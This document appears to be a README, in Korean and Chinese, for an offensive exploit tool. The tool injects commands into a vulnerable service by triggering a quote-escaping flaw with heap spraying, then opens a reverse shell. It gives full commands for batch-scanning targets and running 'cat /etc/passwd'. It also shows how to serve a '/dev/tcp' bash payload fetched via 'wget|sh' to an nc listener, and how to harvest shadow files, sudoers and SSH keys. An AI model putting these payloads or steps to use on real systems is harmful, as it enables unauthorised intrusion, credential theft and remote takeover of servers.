
실행 가능한 명령 탐지 및 원클릭 getshell 포함 (서버 배포 필요)
실행 가능한 명령 탐지 및 원클릭 getshell 포함 (서버 배포 필요) pco.yaml 은 nuclei와 함께 빠르게 탐지 가능
python go.py
대상 URL 입력 → 기능 메뉴 선택.
# 快速探测(8 项基本信息)
python go.py -t https://IP:PORT --probe fast
# 深度探测(全部命令:30+ 项)
python go.py -t https://IP:PORT --probe deep
# 批量探测
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# 批量并发(20 线程)
python go.py -f targets.txt -c "hostname" --batch 20
공격기에서 두 개의 터미널 열기:
# 终端 1 - HTTP 服务(提供 rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# 终端 2 - 等待反弹
nc -lvnp 8088
그런 다음 payload 전송:
# 单目标
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# 批量(串行,一次只能接一个)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
스크립트는 전송 전에 준비 단계를 출력합니다.
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
apiuser="''''" 는 escape_quotes()의 null 종료 결함을 트리거합니다.g0~g60 는 힙 스프레이 61회, 성공률 향상'; <명령> # 컨텍스트 폐쇄, #은 후속 주석echo tag 없이 34자 사용 가능:
wget -O- IP:PORT|sh (31 字符)
파이프 체인: wget 다운로드 → sh 실행 → bash 리버스 연결로 지정된 포트로.
| 카테고리 | 명령어 |
|---|
| 기본 정보 | hostname, uname -a, kernel, OS release, uptime |
| 사용자 | id, whoami, users/w/who |
| 네트워크 | ifconfig, route, arp, listening ports, connections, iptables |
| 시스템 | processes, cpuinfo, meminfo, disk, mount |
| 파일 | ls / /root /tmp /home /etc |
| 설정 | crontab, passwd, shadow, sudoers, SSH keys |
| 확장 | config search, scripts, docker, containers |
| 매개변수 | 설명 |
|---|
-t, --target URL | 대상 주소 |
-f, --file FILE | 대상 목록 파일 |
-l, --lhost IP | 공격기 IP |
-p, --lport PORT | HTTP 서비스 포트 (기본 8087) |
-n, --ncport PORT | nc 리슨 포트 (기본 8088) |
-c, --cmd CMD | 명령 실행 |
--probe fast/deep | 빠른/심층 탐지 |
--batch N | 배치 동시 실행 수 (기본 직렬) |